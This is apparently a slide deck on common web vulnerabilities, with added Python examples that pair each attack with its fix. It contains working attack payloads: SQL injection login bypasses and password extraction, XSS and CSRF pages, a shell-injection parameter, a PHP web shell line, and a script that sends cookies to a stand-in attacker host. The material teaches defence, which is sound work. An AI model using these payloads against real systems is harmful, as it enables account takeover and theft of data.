Web Vulnerabilities for Pros!
Stuff we are gonna cover!
- SQLI
- XSS
- CSRF
- Remote Code execution
- Arbitrary file upload vulnerability
- Session stealing
Why?
Web applications are much easier to exploit than attacking the server directly: every input field is a door, and the whole thing is exposed to the internet...
Plus, we all know there are a lot of sucky devs out there we can rely upon.
SQLI
SQL Injection is a technique for inserting attacker-controlled SQL through a poorly validated entry field, so that it runs as part of the application's own query.
Sony had this vulnerability.
import java.sql.*; // Connection, DriverManager, Statement, ResultSet

// Make connection to DB
Connection connection = DriverManager.getConnection(DataURL, LOGIN, PASSWORD);
String Username = request.getParameter("USER");     // From HTTP request, attacker-controlled
String Password = request.getParameter("PASSWORD"); // From HTTP request, attacker-controlled
int iUserID = -1;
String sLoggedUser = "";
// Both parameters are pasted straight into the SQL text. A USER value of
//   admin' --
// turns it into ... WHERE Username = 'admin' --' AND Password = '...'
// and the password check is commented out.
String sel = "SELECT User_id, Username FROM USERS WHERE Username = '" + Username +
             "' AND Password = '" + Password + "'";
Statement selectStatement = connection.createStatement();
ResultSet resultSet = selectStatement.executeQuery(sel);
if (resultSet.next()) {
    iUserID = resultSet.getInt(1);
    sLoggedUser = resultSet.getString(2);
}
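Added example, not from the slides: the same login query in Python against an in-memory sqlite3 table (a constructed stand-in for the USERS table in the Java snippet), with three classic payloads against the concatenated version and the parameterized fix beside it. Table contents and user names are made up for the demo.

```python
import sqlite3


def make_db():
    """Constructed sample data, stand-in for the USERS table in the Java snippet."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE USERS (User_id INTEGER, Username TEXT, Password TEXT)")
    db.executemany("INSERT INTO USERS VALUES (?, ?, ?)",
                   [(1, "admin", "s3cret"), (2, "alice", "hunter2")])
    return db


def build_vulnerable_query(username, password):
    """Exactly what the Java code does: untrusted strings pasted into SQL text."""
    return ("SELECT User_id, Username FROM USERS WHERE Username = '" + username +
            "' AND Password = '" + password + "'")


def login_vulnerable(db, username, password):
    """Returns every row the (possibly injected) query matches; the Java code takes the first."""
    return db.execute(build_vulnerable_query(username, password)).fetchall()


def login_safe(db, username, password):
    """Parameterized query: values travel separately and can never become SQL."""
    sel = "SELECT User_id, Username FROM USERS WHERE Username = ? AND Password = ?"
    return db.execute(sel, (username, password)).fetchall()


if __name__ == "__main__":
    db = make_db()
    # 1. Comment out the password check: log in as admin with any password.
    print(login_vulnerable(db, "admin' --", "wrong"))            # [(1, 'admin')]
    # 2. Tautology: the WHERE clause is true for every row, the app logs in the first one.
    print(login_vulnerable(db, "' OR '1'='1", "' OR '1'='1"))    # admin and alice
    # 3. UNION: pull the Password column out through the Username column.
    print(login_vulnerable(db, "' UNION SELECT User_id, Password FROM USERS --", "x"))
    # The same payloads against the parameterized version match nothing.
    print(login_safe(db, "admin' --", "wrong"))                   # []
```

The fix is not escaping quotes by hand; it is never letting user data reach the SQL parser as code (a `PreparedStatement` with `?` placeholders in the Java case).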
XSS
Cross Site Scripting, also known as XSS, is a popular type of client-side attack. It allows an attacker to inject client-side scripts of their choosing into web pages viewed by other users, where the script runs with those users' sessions.
CIA had this vulnerability.
<html>
<body>
<p>Data Entered:</p>
<?php
// Whatever arrives in ?data= is echoed back unescaped, so
// ?data=<script>...</script> runs in every visitor's browser.
if(isset($_GET['data']))
{
    $data = $_GET['data'];
}
else
{
    $data = "No Data Entered !";
}
echo "<i>$data</i>";
?>
</body>
</html>
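Added example, not from the slides: the PHP page's echo rewritten in Python, once unescaped and once escaped, with Python's own HTML parser used to check what a browser would actually execute. It goes one step beyond the slide by also showing that escaping alone does not save an unquoted attribute. The payloads are constructed for the demo.

```python
import html
from html.parser import HTMLParser

# Constructed attacker inputs.
SCRIPT_PAYLOAD = "<script>alert(document.cookie)</script>"
ATTR_PAYLOAD = "x onmouseover=alert(1)"


def render_vulnerable(data):
    """Mirrors the PHP: the GET parameter is echoed straight into the page."""
    return "<p>Data Entered:</p><i>" + data + "</i>"


def render_safe(data):
    """HTML-body context: escape < > & and quotes (PHP equivalent: htmlspecialchars)."""
    return "<p>Data Entered:</p><i>" + html.escape(data, quote=True) + "</i>"


def render_attr_unquoted(data):
    """Escaping is context dependent: in an unquoted attribute a space ends the value."""
    return "<input value=" + html.escape(data, quote=True) + ">"


def render_attr_quoted(data):
    """Quoted attribute plus escaping: the whole payload stays inside the value."""
    return '<input value="' + html.escape(data, quote=True) + '">'


class Markup(HTMLParser):
    """Collects the tag names and attribute names a browser would parse out of the page."""

    def __init__(self):
        super().__init__()
        self.tags, self.attr_names = [], []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.attr_names.extend(name for name, _ in attrs)


def parse(page):
    m = Markup()
    m.feed(page)
    return m.tags, m.attr_names


def runs_script(page):
    """True if the page contains a <script> element or any on* event-handler attribute."""
    tags, names = parse(page)
    return "script" in tags or any(n.startswith("on") for n in names)


if __name__ == "__main__":
    print(render_vulnerable(SCRIPT_PAYLOAD), runs_script(render_vulnerable(SCRIPT_PAYLOAD)))
    print(render_safe(SCRIPT_PAYLOAD), runs_script(render_safe(SCRIPT_PAYLOAD)))
    print(render_attr_unquoted(ATTR_PAYLOAD), runs_script(render_attr_unquoted(ATTR_PAYLOAD)))
    print(render_attr_quoted(ATTR_PAYLOAD), runs_script(render_attr_quoted(ATTR_PAYLOAD)))
```

Output encoding has to match where the data lands (body, quoted attribute, JavaScript string, URL); one escaping function for all contexts is how "we escaped it" pages still get XSSed.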
CSRF
Cross Site Request Forgery. A malicious page makes the victim's browser send a request to a site the victim is already logged in to; the browser attaches the victim's cookies automatically, so the site treats the request as the user's own.
<html>
<body>
<h1>Welcome to this page.</h1>
<img src="http://bank.example.com/withdraw?account=Alice&amount=1000000&for=Mallory">
</body>
</html>
How would you CSRF a POST request?
Google was vulnerable to CSRF!
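Added example, not from the slides: the POST answer to the question above (a hidden form that submits itself on load) next to the standard defence, a synchronizer token bound to the session with an HMAC. Everything here is constructed: the bank URL matches the slide, but the session IDs, field names and `SERVER_KEY` are assumptions for the demo.

```python
import hashlib
import hmac
import html
import secrets


# Attacker side. The browser attaches the victim's bank cookies to this POST
# exactly as it does for the <img> request on the slide.
def csrf_post_page(action, fields):
    inputs = "".join('<input type="hidden" name="%s" value="%s">'
                     % (html.escape(k, quote=True), html.escape(v, quote=True))
                     for k, v in fields.items())
    return ('<html><body onload="document.forms[0].submit()">'
            '<form method="POST" action="%s">%s</form></body></html>'
            % (html.escape(action, quote=True), inputs))


# Defender side: a per-session token the attacker's page cannot know.
# SERVER_KEY is an assumed per-deployment secret; a real app loads it from config.
SERVER_KEY = secrets.token_bytes(32)


def issue_token(session_id):
    """Random nonce plus an HMAC binding it to this session; embed it in every form."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(SERVER_KEY, (session_id + ":" + nonce).encode(), hashlib.sha256).hexdigest()
    return nonce + "." + mac


def verify_token(session_id, token):
    """Constant-time check that the token was issued for this session."""
    if not isinstance(token, str) or "." not in token:
        return False
    nonce, mac = token.split(".", 1)
    expected = hmac.new(SERVER_KEY, (session_id + ":" + nonce).encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac, expected)


def handle_withdraw(session_id, form):
    """The bank's POST handler: 403 unless the form carries a valid token for this session."""
    if not verify_token(session_id, form.get("csrf_token", "")):
        return 403
    # ... perform the withdrawal for the logged-in session here ...
    return 200


if __name__ == "__main__":
    print(csrf_post_page("http://bank.example.com/withdraw",
                         {"account": "Alice", "amount": "1000000", "for": "Mallory"}))
    print(handle_withdraw("sess-alice", {"account": "Alice", "amount": "1000000"}))  # 403
    print(handle_withdraw("sess-alice", {"amount": "10", "csrf_token": issue_token("sess-alice")}))  # 200
```

The forged page cannot read the token out of the bank's pages (same-origin policy), so it cannot include it. Modern browsers' SameSite cookie defaults also blunt the attack, but the server-side token is still the check to rely on.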
Remote Code Execution
Usually introduced by lazy developers with very little knowledge of security.
If you use a system call somewhere in your webapp's code without properly sanitizing the input, you'll end up screwing yourself over: a shell metacharacter like ; in the parameter lets the attacker run any command as the web server user. Isn't that f***ing obvious?
<html>
<body>
<p>File Contents:</p>
<?php
echo "<pre>";
// $_GET['filename'] goes straight into a shell command line:
// ?filename=/etc/passwd;id makes the server run id as the web server user.
system("cat " . $_GET['filename']);
echo "</pre>";
?>
</body>
</html>
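Added example, not from the slides: the same `cat` feature in Python, once built as a shell string (the PHP way) and once as an argument list with the path pinned inside a base directory. `demo()` runs both against a temporary directory it creates itself, so the injected command is a harmless `echo`; the file name and contents are constructed for the demo.

```python
import os
import subprocess
import tempfile


def cat_vulnerable(filename):
    """Mirrors the PHP: the parameter is pasted into a command line run by /bin/sh."""
    return subprocess.run("cat " + filename, shell=True,
                          capture_output=True, text=True).stdout


def cat_safe(base_dir, filename):
    """No shell at all (argument list), and the resolved path must stay inside base_dir."""
    base = os.path.realpath(base_dir)
    path = os.path.realpath(os.path.join(base, filename))
    if os.path.commonpath([base, path]) != base:
        raise ValueError("path escapes %s: %r" % (base_dir, filename))
    if not os.path.isfile(path):
        raise FileNotFoundError(filename)
    return subprocess.run(["cat", path], capture_output=True, text=True, check=True).stdout


def demo():
    """Constructed directory holding one file; returns what each version gives an attacker."""
    results = {}
    with tempfile.TemporaryDirectory() as d:
        with open(os.path.join(d, "notes.txt"), "w") as f:
            f.write("hello\n")
        # ';' ends the cat command and starts a second one chosen by the attacker.
        results["vulnerable"] = cat_vulnerable(os.path.join(d, "notes.txt") + "; echo INJECTED")
        results["safe_ok"] = cat_safe(d, "notes.txt")
        for key, name in (("safe_injected", "notes.txt; echo INJECTED"),
                          ("safe_traversal", "../../../../etc/passwd")):
            try:
                cat_safe(d, name)
                results[key] = "executed"
            except (ValueError, FileNotFoundError) as e:
                results[key] = type(e).__name__
    return results


if __name__ == "__main__":
    for k, v in demo().items():
        print(k, "->", repr(v))
```

With the argument-list form the whole parameter, metacharacters included, is one argv entry that `cat` sees as a file name; the directory check then stops the other obvious abuse, reading files outside the intended folder.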
Arbitrary file upload vulnerability
Allowing users to upload files without checking their type or extension, and serving them from a directory where the web server will execute them.
Finding such a vulnerability in your webapp is "GGWP" for the hacker.
The hacker, after finding this, will upload a PHP shell and rip your server apart.
Anonymous, the hacking group's website, had this vulnerability.
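Added example, not from the slides: a Python upload check that accepts only a short list of image extensions, requires the file to start with that type's magic bytes, and never keeps the client's file name. The allowed types, size limit and the sample PHP shell / PNG header are constructed for the demo.

```python
import os
import secrets

# Allowed extension -> the magic bytes a file of that type must start with.
MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}
MAX_BYTES = 5 * 1024 * 1024   # assumed limit for the demo


def validate_upload(client_name, content):
    """Return a server-generated file name if the upload is an allowed image, else raise."""
    if len(content) > MAX_BYTES:
        raise ValueError("too large")
    base = os.path.basename(client_name.replace("\\", "/"))   # drop any path the client sent
    if "\x00" in base or "." not in base:
        raise ValueError("bad filename")
    ext = base.rsplit(".", 1)[1].lower()        # only the LAST extension counts
    if ext == "jpeg":
        ext = "jpg"
    if ext not in MAGIC:
        raise ValueError("extension not allowed: " + ext)
    if not content.startswith(MAGIC[ext]):
        raise ValueError("content does not look like " + ext)
    # Never keep the client's name: random name, one known extension, no path.
    return secrets.token_hex(16) + "." + ext


def check(client_name, content):
    """Demo helper: 'accepted:<ext>' or 'rejected:<reason>'."""
    try:
        return "accepted:" + validate_upload(client_name, content).rsplit(".", 1)[1]
    except ValueError as e:
        return "rejected:" + str(e)


# Constructed samples: a PHP web shell and the start of a PNG file.
PHP_SHELL = b"<?php system($_GET['cmd']); ?>"
PNG_HEAD = MAGIC["png"] + b"\x00\x00\x00\rIHDR"

if __name__ == "__main__":
    for name, body in [("shell.php", PHP_SHELL), ("shell.php.jpg", PHP_SHELL),
                       ("shell.jpg.php", PNG_HEAD), ("../../var/www/x.png", PNG_HEAD)]:
        print(name, "->", check(name, body))
```

The magic-byte check is not the whole defence: a real PNG with PHP hidden in a metadata chunk passes it. The uploads directory therefore also has to live outside the web root (or have script execution switched off) and files should be served back through a handler, not executed in place.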
Session stealing...
It's not a separate vulnerability but the most common use of XSS (stored or reflected): grab the victim's session cookie and send it to a server you control.
<script type="text/javascript">
// Redirects the victim to the attacker's logger with all their cookies in the query string.
document.location = "http://www.stealer.com/cookielogger.php?cookie=" + document.cookie;
</script>
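Added example, not from the slides: the server side of this in Python, showing what the logger at the stealer.com URL actually receives, and the Set-Cookie flags (HttpOnly above all) that keep the session ID out of `document.cookie` so the payload has nothing to send. The cookie names and values are constructed for the demo.

```python
from http.cookies import SimpleCookie
from urllib.parse import parse_qs, urlsplit


def logged_cookies(request_url):
    """What cookielogger.php sees: document.cookie, one 'name=value; name=value' string."""
    raw = parse_qs(urlsplit(request_url).query).get("cookie", [""])[0]
    return dict(item.split("=", 1) for item in raw.split("; ") if "=" in item)


def session_cookie_header(session_id):
    """Set-Cookie for a PHP-style session ID with the flags that blunt the payload."""
    c = SimpleCookie()
    c["PHPSESSID"] = session_id
    c["PHPSESSID"]["httponly"] = True   # not visible to document.cookie
    c["PHPSESSID"]["secure"] = True     # never sent over plain HTTP
    c["PHPSESSID"]["samesite"] = "Lax"
    c["PHPSESSID"]["path"] = "/"
    return c.output(header="Set-Cookie:")


def script_readable(set_cookie_header):
    """For each cookie on a Set-Cookie line: would document.cookie expose it to the payload?"""
    c = SimpleCookie()
    c.load(set_cookie_header.split(":", 1)[1].strip())
    return {name: not morsel["httponly"] for name, morsel in c.items()}


# Constructed request, as the payload above would produce it for a victim whose
# browser holds a PHPSESSID and a 'user' cookie for the vulnerable site.
EXFIL_URL = "http://www.stealer.com/cookielogger.php?cookie=PHPSESSID=ab12cd34; user=alice"

if __name__ == "__main__":
    print(logged_cookies(EXFIL_URL))
    hdr = session_cookie_header("ab12cd34")
    print(hdr)
    print(script_readable(hdr))
    print(script_readable("Set-Cookie: PHPSESSID=ab12cd34; Path=/"))
```

HttpOnly stops the cookie grab but not XSS itself: the injected script can still make requests as the victim from inside the page, so it is a mitigation on top of output encoding, not a replacement for it.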
Hint:
Makes sense?
Web Vulnerabilities
By Aneesh Dogra